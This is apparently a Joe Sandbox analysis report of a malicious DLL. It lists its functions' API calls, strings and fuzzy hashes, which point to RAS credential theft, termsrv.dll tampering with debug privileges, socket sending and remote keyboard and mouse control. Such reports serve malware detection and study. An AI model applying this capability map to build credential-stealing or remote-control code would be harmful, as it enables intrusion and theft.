                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AddressLibraryLoadProc$wsprintf
                                                          • String ID: .$2$3$D$I$L$_RasDefaultCredentials#0$LsaFreeMemory$P$RasDialParams!%s#0$V$d
                                                          • API String ID: 2290142023-608447665
                                                          • Opcode ID: ce02f7ea02b34bf1def763f01addefc66c280edfd5cd4819a27cc4b3bb6cd685
                                                          • Instruction ID: 4c1d29f0bd828654cd513fdf21a7457cee7c04ca4083380b940b1afa8f540c18
                                                          • Opcode Fuzzy Hash: ce02f7ea02b34bf1def763f01addefc66c280edfd5cd4819a27cc4b3bb6cd685
                                                          • Instruction Fuzzy Hash: 123105751083809FE301CF68C894A6BBBE9AF99B04F44495CF5C987342D775E90CCBA6
                                                          Function 10001000 Relevance: 24.6, APIs: 6, Strings: 8, Instructions: 91libraryloaderCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • LoadLibraryA.KERNEL32 ref: 1000105A
                                                          • GetProcAddress.KERNEL32(00000000), ref: 10001061
                                                          • #823.MFC42(000003E8), ref: 1000109D
                                                          • #823.MFC42(00000020,000003E8), ref: 100010A7
                                                          • #823.MFC42(000003E8,00000020,000003E8), ref: 100010B2
                                                          • #823.MFC42(00000020,000003E8,00000020,000003E8), ref: 100010BC
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: #823$AddressLibraryLoadProc
                                                          • String ID: A$C$E$KERNEL32.dll$a$n$r$v
                                                          • API String ID: 4155842574-2549505875
                                                          • Opcode ID: a16daf83469977fc098d6e9d6d2204c32631686849e5759c66df8540c12cc638
                                                          • Instruction ID: d4cdf86d6ce510d6661d11d19ce4d48ee2c343f99e241af99f0dca74e59b5833
                                                          • Opcode Fuzzy Hash: a16daf83469977fc098d6e9d6d2204c32631686849e5759c66df8540c12cc638
                                                          • Instruction Fuzzy Hash: 9E317CB04087819ED310CF69D844647FBE8FF59308F44495EE1C987712D7B9E648CBAA
                                                          Function 10027180 Relevance: 24.6, APIs: 9, Strings: 5, Instructions: 65sleepstringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetSystemDirectoryA.KERNEL32(00000000,00000104), ref: 10027190
                                                          • lstrcatA.KERNEL32(?,\termsrv.dll), ref: 100271A0
                                                            • Part of subcall function 1001B690: GetCurrentProcess.KERNEL32(00000028,00000000,00000001,?,?), ref: 1001B69A
                                                            • Part of subcall function 1001B690: OpenProcessToken.ADVAPI32(00000000), ref: 1001B6A1
                                                            • Part of subcall function 100270F0: CreateToolhelp32Snapshot.KERNEL32 ref: 10027105
                                                            • Part of subcall function 100270F0: Process32First.KERNEL32(00000000,?), ref: 10027112
                                                            • Part of subcall function 100270F0: Process32Next.KERNEL32(00000000,?), ref: 10027150
                                                            • Part of subcall function 100270F0: CloseHandle.KERNEL32(00000000,00000000,?), ref: 1002715B
                                                            • Part of subcall function 1001B690: LookupPrivilegeValueA.ADVAPI32(00000000,?,?), ref: 1001B6D2
                                                            • Part of subcall function 1001B690: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000010,00000000,00000000), ref: 1001B6EA
                                                            • Part of subcall function 1001B690: GetLastError.KERNEL32(?,00000000,?,00000010,00000000,00000000), ref: 1001B6F0
                                                            • Part of subcall function 1001B690: CloseHandle.KERNEL32(00000000,?,00000000,?,00000010,00000000,00000000), ref: 1001B6FF
                                                            • Part of subcall function 1001B690: CloseHandle.KERNEL32(?,?,00000000,?,00000010,00000000,00000000), ref: 1001B710
                                                          • GetProcessId.KERNEL32(csrss.exe,?,?,?,00000065,?,?,\termsrv.dll), ref: 100271E9
                                                          • AbortSystemShutdownA.ADVAPI32(00000000), ref: 100271F9
                                                          • GetProcessId.KERNEL32(drwtsn32.exe,?,771B0F00,?,?,?,00000065,?,?,\termsrv.dll), ref: 10027212
                                                          • EnumWindows.USER32(10026EF0,00000000), ref: 10027222
                                                          • EnumWindows.USER32(10026EF0,00000000), ref: 1002722A
                                                          • Sleep.KERNEL32(0000000A,?,771B0F00,?,?,?,00000065,?,?,\termsrv.dll), ref: 1002722E
                                                          • AbortSystemShutdownA.ADVAPI32(00000000), ref: 10027232
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Process$CloseHandleSystem$AbortEnumProcess32ShutdownTokenWindows$AdjustCreateCurrentDirectoryErrorFirstLastLookupNextOpenPrivilegePrivilegesSleepSnapshotToolhelp32Valuelstrcat
                                                          • String ID: SeDebugPrivilege$SeShutdownPrivilege$\termsrv.dll$csrss.exe$drwtsn32.exe
                                                          • API String ID: 1044539573-3630850118
                                                          • Opcode ID: c58a50b7ba612e40a225f9186a65e155ab20136a55424810904a3657379bc63a
                                                          • Instruction ID: 799067c6e7043d64c921be5b6f4e7f39e9bfd6ad8c0208510c147185ede4a413
                                                          • Opcode Fuzzy Hash: c58a50b7ba612e40a225f9186a65e155ab20136a55424810904a3657379bc63a
                                                          • Instruction Fuzzy Hash: C811E97D600719B7F610E7B4AC85FDA3758FB54744F840415F708990D1EB75E8448676
                                                          Function 100064C0 Relevance: 22.9, APIs: 15, Instructions: 369COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • #823.MFC42(0000001C,00000000,?,00000000,00000000,?,10006386,?,?,00000000,?,?,00000000,?,?), ref: 10006540
                                                          • #825.MFC42(00000000,00000000,?,00000000,00000000,?,10006386,?,?,00000000,?,?,00000000,?,?), ref: 10006583
                                                          • #823.MFC42(?,00000000,?,00000000,00000000,?,10006386,?,?,00000000,?,?,00000000,?,?), ref: 10006597
                                                          • #825.MFC42(00000000,00000000,?,00000000,00000000,?,10006386,?,?,00000000,?,?,00000000,?,?), ref: 100065DD
                                                          • #823.MFC42(?,00000000,?,00000000,00000000,?,10006386,?,?,00000000,?,?,00000000,?,?), ref: 100065F1
                                                          • #825.MFC42(?,00000000,?,00000000,00000000,?,10006386,?,?,00000000,?,?,00000000,?,?), ref: 10006637
                                                          • #823.MFC42(?,00000000,?,00000000,00000000,?,10006386,?,?,00000000,?,?,00000000,?,?), ref: 1000664B
                                                          • #825.MFC42(?,00000000,?,00000000,00000000,?,10006386,?,?,00000000,?,?,00000000,?,?), ref: 10006691
                                                          • #823.MFC42(?,00000000,?,00000000,00000000,?,10006386,?,?,00000000,?,?,00000000,?,?), ref: 100066A5
                                                          • #825.MFC42(?,00000000,?,00000000,00000000,?,10006386,?,?,00000000,?,?,00000000,?,?), ref: 100066EB
                                                          • #823.MFC42(?,00000000,?,00000000,00000000,?,10006386,?,?,00000000,?,?,00000000,?,?), ref: 100066FF
                                                          • #825.MFC42(?,?,?), ref: 10006758
                                                          • #823.MFC42(?,?,?), ref: 1000676C
                                                          • #825.MFC42(00000000,?,?), ref: 100067B1
                                                          • #823.MFC42(?,?,?), ref: 100067C5
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: #823$#825
                                                          • String ID:
                                                          • API String ID: 2704444950-0
                                                          • Opcode ID: 7bec8dbf16562bad003da3af1f42c1a03097033c04e808ff0bba191b4fb42cb9
                                                          • Instruction ID: 60a5b56d8eae0c97300d1150149c5d3cd1187e5e90251027326246755cc62438
                                                          • Opcode Fuzzy Hash: 7bec8dbf16562bad003da3af1f42c1a03097033c04e808ff0bba191b4fb42cb9
                                                          • Instruction Fuzzy Hash: 0BC1D0B57046054BEB18CE38D89292B77D2EF982A0B65863CFD1A877C5DF71ED058780
                                                          Function 10012630 Relevance: 22.9, APIs: 9, Strings: 4, Instructions: 114libraryloadersleepCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • LoadLibraryA.KERNEL32(ws2_32.dll), ref: 10012641
                                                          • GetProcAddress.KERNEL32(00000000,closesocket), ref: 10012651
                                                          • wsprintfA.USER32 ref: 10012683
                                                          • CloseHandle.KERNEL32(00000000), ref: 100126D7
                                                          • Sleep.KERNEL32(00000002), ref: 100126F1
                                                          • LoadLibraryA.KERNEL32(ws2_32.dll), ref: 10012730
                                                          • GetProcAddress.KERNEL32(00000000,send), ref: 1001273C
                                                          • FreeLibrary.KERNEL32(?), ref: 10012794
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Library$AddressLoadProc$CloseFreeHandleSleepwsprintf
                                                          • String ID: ID= %d $closesocket$send$ws2_32.dll
                                                          • API String ID: 1680113600-2339802411
                                                          • Opcode ID: 1e004e0467ac5dc5021d6473d21da3e49f18c438dae7c27dbc7de7b95a398db1
                                                          • Instruction ID: c6c0da67d46d13d68f268ba758adfad6d1a8e6a04e0d0a6cfae2b139a2cc5429
                                                          • Opcode Fuzzy Hash: 1e004e0467ac5dc5021d6473d21da3e49f18c438dae7c27dbc7de7b95a398db1
                                                          • Instruction Fuzzy Hash: 5941B3B9608355AFD714DF78CC88B9BB7E4FB88344F040A18F985DB281D774E9608B61
                                                          Function 10006400 Relevance: 22.8, APIs: 9, Strings: 4, Instructions: 74libraryloaderCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • LoadLibraryA.KERNEL32(KERNEL32.dll,MultiByteToWideChar,00000000,?,0000005C,?,1000620E,00000000), ref: 10006416
                                                          • GetProcAddress.KERNEL32(00000000), ref: 1000641F
                                                          • LoadLibraryA.KERNEL32(KERNEL32.dll,WideCharToMultiByte,?,0000005C,?,1000620E,00000000), ref: 1000642F
                                                          • GetProcAddress.KERNEL32(00000000), ref: 10006432
                                                          • LoadLibraryA.KERNEL32(KERNEL32.dll,lstrlenA,?,0000005C,?,1000620E,00000000), ref: 10006442
                                                          • GetProcAddress.KERNEL32(00000000), ref: 10006445
                                                          • #823.MFC42(00000002,?,0000005C,?,1000620E,00000000), ref: 10006461
                                                          • #823.MFC42(00000002,00000002,?,0000005C,?,1000620E,00000000), ref: 10006469
                                                          • #825.MFC42(00000000,?,0000005C,?,1000620E,00000000), ref: 10006495
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AddressLibraryLoadProc$#823$#825
                                                          • String ID: KERNEL32.dll$MultiByteToWideChar$WideCharToMultiByte$lstrlenA
                                                          • API String ID: 1309867234-4059950253
                                                          • Opcode ID: de985ad3ca3c376d577d203f73a74155a7ef575b49d7e2c64786a38d6ce3dcf2
                                                          • Instruction ID: d930753b1a83691b9448020b77acedb0431273c8944958dfca86a203c0a050f8
                                                          • Opcode Fuzzy Hash: de985ad3ca3c376d577d203f73a74155a7ef575b49d7e2c64786a38d6ce3dcf2
                                                          • Instruction Fuzzy Hash: 861136B694031837DA10A7B56C49F8B3E9CCF867B0F15052AFB00B7180DD24A804C6F2
                                                          Function 1002BCB0 Relevance: 22.8, APIs: 2, Strings: 11, Instructions: 74libraryloaderCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • LoadLibraryA.KERNEL32(?,?,?,?,00000010), ref: 1002BD4B
                                                          • GetProcAddress.KERNEL32(00000000), ref: 1002BD52
                                                            • Part of subcall function 1002BFA0: LoadLibraryA.KERNEL32(USER32.dll,OpenDesktopA,?,?,00000000,1002BD69,00000000), ref: 1002BFBB
                                                            • Part of subcall function 1002BFA0: GetProcAddress.KERNEL32(00000000), ref: 1002BFC4
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AddressLibraryLoadProc
                                                          • String ID: .$2$3$K$L$N$R$S$d$n$v
                                                          • API String ID: 2574300362-924470386
                                                          • Opcode ID: 0a80541538b13eb98ff8583e53880da1e37687e13317643f967dd40b626b0a5f
                                                          • Instruction ID: e9478d8d8c80935fd8ff63d2a19e63404a72a50bb6816d5186a561986cbbe352
                                                          • Opcode Fuzzy Hash: 0a80541538b13eb98ff8583e53880da1e37687e13317643f967dd40b626b0a5f
                                                          • Instruction Fuzzy Hash: 3A317F75D092CCDEDB01CBE8D884ADEBFB8AF2A240F084159E54577382C2794608CBB6
                                                          Function 1002BEF0 Relevance: 22.8, APIs: 8, Strings: 5, Instructions: 64libraryloaderthreadCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • LoadLibraryA.KERNEL32(KERNEL32.dll,GetCurrentThreadId,771B0BD0,00000000,?,771AF550), ref: 1002BF0A
                                                          • GetProcAddress.KERNEL32(00000000), ref: 1002BF13
                                                          • LoadLibraryA.KERNEL32(USER32.dll,GetThreadDesktop,?,771AF550), ref: 1002BF21
                                                          • GetProcAddress.KERNEL32(00000000), ref: 1002BF24
                                                          • GetUserObjectInformationA.USER32(?,00000002,?,00000100,?), ref: 1002BF48
                                                          • SetThreadDesktop.USER32(?,?,771AF550), ref: 1002BF5E
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AddressLibraryLoadProc$DesktopInformationObjectThreadUser
                                                          • String ID: CloseDesktop$GetCurrentThreadId$GetThreadDesktop$KERNEL32.dll$USER32.dll
                                                          • API String ID: 2607951617-608436089
                                                          • Opcode ID: 260afe34fd4c68afadb73e998c92c80956322b70d1d4d6c5dcd413ab2e046d08
                                                          • Instruction ID: c78d99be652b19315987e14cb35b5e183e4f240bfeef975a01ad198cc4a000aa
                                                          • Opcode Fuzzy Hash: 260afe34fd4c68afadb73e998c92c80956322b70d1d4d6c5dcd413ab2e046d08
                                                          • Instruction Fuzzy Hash: BE01B5B674021D2BE610A7B9AC88FDB774CEBC0761F854532FB04D2141EA6DB84596B4
                                                          Function 10017D20 Relevance: 21.2, APIs: 14, Instructions: 203COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • LoadCursorA.USER32(00000000,00000000), ref: 10017DFF
                                                            • Part of subcall function 10018A20: ReleaseDC.USER32(00000000,?), ref: 10018A38
                                                            • Part of subcall function 10018A20: GetDC.USER32(00000000), ref: 10018A40
                                                          • GetDC.USER32(00000000), ref: 10017E52
                                                          • QueryPerformanceFrequency.KERNEL32(00000030), ref: 10017E5F
                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 10017E81
                                                          • GetDeviceCaps.GDI32(?,00000076), ref: 10017E9E
                                                          • GetDeviceCaps.GDI32(?,00000075), ref: 10017EA9
                                                          • CreateCompatibleDC.GDI32(?), ref: 10017EC7
                                                          • CreateCompatibleDC.GDI32(?), ref: 10017ED0
                                                          • CreateCompatibleDC.GDI32(?), ref: 10017ED9
                                                          • CreateDIBSection.GDI32(?,?,00000000,00000058,00000000,00000000), ref: 10017F26
                                                          • CreateDIBSection.GDI32(?,?,00000000,0000005C,00000000,00000000), ref: 10017F37
                                                          • SelectObject.GDI32(?,?), ref: 10017F4A
                                                          • SelectObject.GDI32(?,?), ref: 10017F54
                                                          • #823.MFC42(?,?,?,?,00000000), ref: 10017F5F
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Create$Compatible$CapsDeviceObjectSectionSelect$#823CursorFrequencyLoadPerformanceQueryReleaseUnothrow_t@std@@@__ehfuncinfo$??2@
                                                          • String ID:
                                                          • API String ID: 1396098503-0
                                                          • Opcode ID: b320cf3e43d5f69ce13cdc363c04ae0b3c7bef57714eee9ac65f9eae9de58433
                                                          • Instruction ID: f5b09e1389df2f3a8d9c5176518bf7bbc65b6c3c0f8f13021ea446bacafcd8a0
                                                          • Opcode Fuzzy Hash: b320cf3e43d5f69ce13cdc363c04ae0b3c7bef57714eee9ac65f9eae9de58433
                                                          • Instruction Fuzzy Hash: 2981F2B5504B459FD320CF29C884A6BFBF9FB88704F008A1DE58A87750DB79F8058B91
                                                          Function 100179C0 Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 176librarykeyboardloaderCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 1002C5D0: GetCurrentThreadId.KERNEL32 ref: 1002C5E2
                                                            • Part of subcall function 1002C5D0: GetThreadDesktop.USER32(00000000), ref: 1002C5E9
                                                            • Part of subcall function 1002C5D0: GetUserObjectInformationA.USER32(00000000,00000002,?,00000100,?), ref: 1002C61C
                                                            • Part of subcall function 1002C5D0: OpenInputDesktop.USER32(00000000,00000000,02000000), ref: 1002C627
                                                            • Part of subcall function 1002C5D0: GetUserObjectInformationA.USER32(00000000,00000002,?,00000100,?), ref: 1002C64E
                                                            • Part of subcall function 1002C5D0: lstrcmpiA.KERNEL32(?,?), ref: 1002C65D
                                                            • Part of subcall function 1002C5D0: SetThreadDesktop.USER32(00000000), ref: 1002C668
                                                            • Part of subcall function 1002C5D0: CloseDesktop.USER32(00000000), ref: 1002C680
                                                            • Part of subcall function 1002C5D0: CloseDesktop.USER32(00000000), ref: 1002C683
                                                          • SetCursorPos.USER32(?,?,?,?,?,?,1001751F,?,?,00000000), ref: 10017A28
                                                          • WindowFromPoint.USER32(?,?,?,?,?,?,1001751F,?,?,00000000), ref: 10017A30
                                                          • SetCapture.USER32(00000000,?,?,?,?,1001751F,?,?,00000000), ref: 10017A37
                                                          • LoadLibraryA.KERNEL32(USER32.dll,keybd_event,?,?,?,?,1001751F,?,?,00000000), ref: 10017A4D
                                                          • GetProcAddress.KERNEL32(00000000), ref: 10017A50
                                                          • LoadLibraryA.KERNEL32(USER32.dll,mouse_event,?,?,?,?,1001751F,?,?,00000000), ref: 10017A5E
                                                          • GetProcAddress.KERNEL32(00000000), ref: 10017A61
                                                          • MapVirtualKeyA.USER32(?,00000000), ref: 10017A9A
                                                          • MapVirtualKeyA.USER32(?,00000000), ref: 10017AB4
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Desktop$Thread$AddressCloseInformationLibraryLoadObjectProcUserVirtual$CaptureCurrentCursorFromInputOpenPointWindowlstrcmpi
                                                          • String ID: USER32.dll$keybd_event$mouse_event
                                                          • API String ID: 1441364844-718119381
